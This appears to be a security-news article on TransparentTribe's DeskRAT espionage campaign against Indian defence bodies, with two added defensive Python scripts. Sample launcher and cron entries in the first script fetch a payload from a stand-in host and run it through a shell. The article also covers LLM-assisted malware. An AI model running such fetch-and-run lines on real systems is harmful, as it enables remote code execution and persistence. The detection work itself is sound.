A notorious Pakistan-linked hacking group known as TransparentTribe (APT36 or Operation C-Major) has resurfaced with a sophisticated cyber-espionage campaign targeting Indian military and government organizations. According to Sekoia.io’s latest threat report, the group has deployed a newly developed Golang-based Remote Access Trojan (RAT) called DeskRAT, capable of infiltrating Linux systems and maintaining persistence for long-term intelligence collection.
This campaign, active since mid-2025, begins with phishing emails crafted to impersonate official Indian defense communications. The emails contain malicious ZIP files disguised as government documents, which, when opened, unleash a multi-stage infection chain that ultimately installs DeskRAT.
The lure documents—bearing titles like “MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.zip”—mimic authentic Ministry of Defence communications, complete with embedded icons and decoy PDFs. These PDFs reference sensitive defense topics and current events, such as protests in the Ladakh region, to trick targets into urgent action.
Once executed, the malicious “.desktop” file downloads and runs a payload from staging servers masquerading as legitimate government domains (e.g., modgovindia[.]com). This payload installs DeskRAT, which connects to remote command-and-control (C2) servers over WebSocket, enabling attackers to exfiltrate files, execute commands, and maintain persistence within the victim’s system.
Inside DeskRAT: An LLM-Assisted Malware
What sets DeskRAT apart is its technical design and suspected use of Large Language Models (LLMs) to generate code. Analysts observed unusually uniform function names—such as ___simulate_systemd_operations() and ___perform_sandbox_evasion()—suggesting automation in its development.
DeskRAT’s capabilities include:
- File exfiltration of over 20 formats including PDF, DOC, ZIP, and image files.
- Remote code execution using standard Linux commands.
- Persistence mechanisms via systemd services, cron jobs, and startup scripts.
- Decoy operations to mask malicious behavior under legitimate system processes.
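The infection chain above hinges on a `.desktop` launcher that fetches and runs a stager, and on persistence planted in systemd units, cron jobs and startup scripts. The following Python script is an added example (not code from the Sekoia report or from DeskRAT itself) showing how a defender can triage those three artefact types on a Linux host: it parses the INI-like `.desktop` and unit formats, and flags launch commands that download content and hand it to a shell, that execute from temp or hidden directories, or that present an application as a document. All sample artefacts, hostnames and the `SUSPICIOUS_DIRS` heuristics are constructed for this example; the function names are hypothetical.

```python
"""Triage of Linux autostart artefacts: XDG .desktop entries, systemd unit
files and crontab lines. Sample inputs are constructed for this example."""
import configparser
import re

# Directories a legitimate launcher or service rarely executes from (heuristic).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/.cache/", "/.config/")
FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")
SHELL_EXEC = re.compile(r"\b(bash|sh|dash|zsh)\s+-c\b|\|\s*(ba)?sh\b|chmod\s+\+x")
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|zip)$", re.IGNORECASE)


def score_command(cmd):
    """Return the reasons a launch command looks like a stager; empty if none."""
    reasons = []
    if FETCH_TOOLS.search(cmd) and SHELL_EXEC.search(cmd):
        reasons.append("downloads content and hands it to a shell")
    hits = [d for d in SUSPICIOUS_DIRS if d in cmd]
    if hits:
        reasons.append("executes from " + ", ".join(hits))
    return reasons


def _parse_ini(text):
    # .desktop and unit files are INI-like; '%U' style fields need interpolation off,
    # keys are case-sensitive, and units may repeat keys (strict=False keeps the last).
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def triage_desktop(text):
    """Flag a .desktop file whose Exec looks like a stager or that mimics a document."""
    cp = _parse_ini(text)
    if "Desktop Entry" not in cp:
        return ["not a Desktop Entry file"]
    entry = cp["Desktop Entry"]
    reasons = score_command(entry.get("Exec", ""))
    # An Application whose Name imitates a document (the lure pattern described above).
    if entry.get("Type") == "Application" and DOC_EXT.search(entry.get("Name", "")):
        reasons.append("application disguised as a document")
    return reasons


def triage_unit(text):
    """Flag a systemd service whose ExecStart runs from a suspicious path or fetches code."""
    cp = _parse_ini(text)
    if "Service" not in cp:
        return []
    return score_command(cp["Service"].get("ExecStart", ""))


def triage_crontab(text):
    """Return {cron line: reasons} for entries whose command looks like a stager."""
    findings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Schedule is either five fields or a single @keyword such as @reboot.
        expected = 2 if line.startswith("@") else 6
        parts = line.split(None, expected - 1)
        if len(parts) < expected:
            continue
        reasons = score_command(parts[-1])
        if reasons:
            findings[line] = reasons
    return findings


# Constructed samples: a document-looking launcher with a fetch-and-run Exec,
# a benign launcher, a user service hidden under ~/.config, and a crontab.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Minutes_of_Meeting_25_Sep.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "wget -q http://staging.example.invalid/s -O /tmp/.s && chmod +x /tmp/.s && /tmp/.s"
"""
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
"""
SAMPLE_UNIT = """[Unit]
Description=System update helper
[Service]
ExecStart=/home/user/.config/.systemd-helper/updater
Restart=always
[Install]
WantedBy=default.target
"""
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/backup --quiet
@reboot /bin/sh -c "curl -s http://staging.example.invalid/c | sh"
"""

if __name__ == "__main__":
    print("desktop:", triage_desktop(SAMPLE_DESKTOP))
    print("benign :", triage_desktop(BENIGN_DESKTOP))
    print("unit   :", triage_unit(SAMPLE_UNIT))
    print("cron   :", triage_crontab(SAMPLE_CRONTAB))
```

On a real host the same functions would be fed the contents of `~/.config/autostart/*.desktop`, `~/.config/systemd/user/*.service`, `/etc/systemd/system/*.service` and the output of `crontab -l`; the heuristics are deliberately narrow so that findings are reviewable by hand rather than a blocklist.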
The malware specifically targets Bharat Operating System Solutions (BOSS)—a Linux distribution endorsed by the Indian government—indicating a calculated focus on defense and state organizations.
Political Timing and Strategic Motives
The campaign’s timing aligns with domestic unrest in India’s Ladakh region, an area of geopolitical tension between India, China, and Pakistan. TransparentTribe has a history of exploiting such moments to conduct cyber espionage supporting Pakistan’s strategic interests.
By embedding decoy documents referencing military directives and regional security meetings, the attackers exploit psychological and contextual cues to lure officials into executing malicious files.
Sekoia’s analysts assess with high confidence that these activities are part of a long-running effort by TransparentTribe to gather defense intelligence, track operational movements, and potentially lay the groundwork for future disruptive campaigns.
Why It Matters Globally — and in MEA
While this campaign focuses on South Asia, its implications are global. The use of AI-assisted malware development, combined with social engineering through geopolitical events, signals a growing trend in state-sponsored attacks.
For governments and enterprises across the Middle East and Africa, the TransparentTribe case serves as a warning. As many MEA nations strengthen their defense and digital infrastructure, similar tactics could target regional ministries, telecom operators, or defense contractors.
10 Recommended Security Actions
Security teams can take the following steps to defend against campaigns like DeskRAT:
- Deploy advanced email security to block phishing campaigns.
- Use endpoint protection capable of detecting Linux-based malware.
- Limit execution permissions for .desktop files and unknown scripts.
- Implement strict patch management across Linux and BOSS distributions.
- Monitor WebSocket traffic for suspicious outbound connections.
- Isolate government and defense systems from internet-facing services.
- Educate users through cybersecurity training and awareness programs on recognizing phishing and decoy documents.
- Apply least privilege principles for administrative access.
- Leverage threat intelligence services such as Saintynet Cybersecurity to track APT activities.
- Conduct regular phishing simulations and tabletop exercises to reinforce response readiness.
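DeskRAT reaches its C2 over WebSocket through staging servers that imitate government domains, and the recommendations above call for monitoring WebSocket traffic for suspicious outbound connections. The following Python script is an added example (not part of the report or any vendor product) of how to review proxy or web logs for that pattern: it keeps only records with an `Upgrade: websocket` handshake, drops destinations on an allowlist, and annotates the rest with reasons such as a government look-alike hostname, a direct-to-IP destination or a non-standard port. The JSON record layout, the allowlist, the `.gov.in`/`.nic.in` suffix assumption and the brand tokens are all constructed for this example.

```python
"""Review outbound WebSocket upgrades in proxy logs against an allowlist and
government look-alike naming. Log lines and names are constructed."""
import json

# Constructed allowlist of destinations expected to speak WebSocket.
WS_ALLOWLIST = {"collab.internal.example", "chat.internal.example"}
# Assumption for the example: genuine Indian government hosts sit under these suffixes.
OFFICIAL_SUFFIXES = (".gov.in", ".nic.in")
# Tokens an impersonating domain tends to borrow (heuristic).
BRAND_TOKENS = ("gov", "mod", "nic", "defence", "defense")

# Constructed proxy records, one JSON object per line: timestamp, client,
# requested host, port and the value of the HTTP Upgrade header if any.
SAMPLE_LOG = """
{"ts":"2025-10-01T08:12:03Z","src":"10.20.1.15","host":"collab.internal.example","port":443,"upgrade":"websocket"}
{"ts":"2025-10-01T08:13:41Z","src":"10.20.1.15","host":"modgovindia.example","port":443,"upgrade":"websocket"}
{"ts":"2025-10-01T08:14:02Z","src":"10.20.1.22","host":"www.mod.gov.in","port":443,"upgrade":""}
{"ts":"2025-10-01T08:15:55Z","src":"10.20.1.31","host":"203.0.113.7","port":8080,"upgrade":"websocket"}
"""


def parse_records(text):
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def looks_like_official(host):
    """True when a name borrows a government token but is not under an official suffix."""
    h = host.lower()
    if h.endswith(OFFICIAL_SUFFIXES):
        return False
    return any(tok in h for tok in BRAND_TOKENS)


def is_ip_literal(host):
    """Crude IPv4 literal check; C2 by bare IP is worth a second look."""
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() for p in parts)


def flag_websocket(records):
    """Return one alert per non-allowlisted WebSocket upgrade, with reasons."""
    alerts = []
    for rec in records:
        if rec.get("upgrade", "").lower() != "websocket":
            continue
        host = rec["host"]
        if host in WS_ALLOWLIST:
            continue
        reasons = ["WebSocket upgrade to non-allowlisted host"]
        if looks_like_official(host):
            reasons.append("government look-alike name")
        if is_ip_literal(host):
            reasons.append("direct-to-IP destination")
        if rec.get("port") not in (80, 443):
            reasons.append("non-standard port %s" % rec.get("port"))
        alerts.append({"ts": rec["ts"], "src": rec["src"], "host": host, "reasons": reasons})
    return alerts


def sources_by_alert_count(alerts):
    """Count alerts per client so repeat offenders surface first."""
    counts = {}
    for a in alerts:
        counts[a["src"]] = counts.get(a["src"], 0) + 1
    return dict(sorted(counts.items(), key=lambda kv: -kv[1]))


if __name__ == "__main__":
    found = flag_websocket(parse_records(SAMPLE_LOG))
    for a in found:
        print(a["ts"], a["src"], "->", a["host"], "|", "; ".join(a["reasons"]))
    print("per-client:", sources_by_alert_count(found))
```

The allowlist approach assumes the set of legitimate WebSocket destinations on a defense or government network is small and known; where it is not, the same records can be baselined per client over a few weeks before alerts are enabled.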
Conclusion
TransparentTribe’s DeskRAT campaign underscores how nation-state actors are evolving—faster, smarter, and increasingly AI-driven. By shifting from open-source tools to custom-built malware, the group demonstrates a high level of technical maturity and focus on long-term espionage.
For defenders, this incident is a stark reminder: cyber warfare is no longer limited to the battlefield—it’s embedded in everyday digital operations. Staying ahead requires not just patching and monitoring, but strategic resilience, awareness, and collaboration across borders.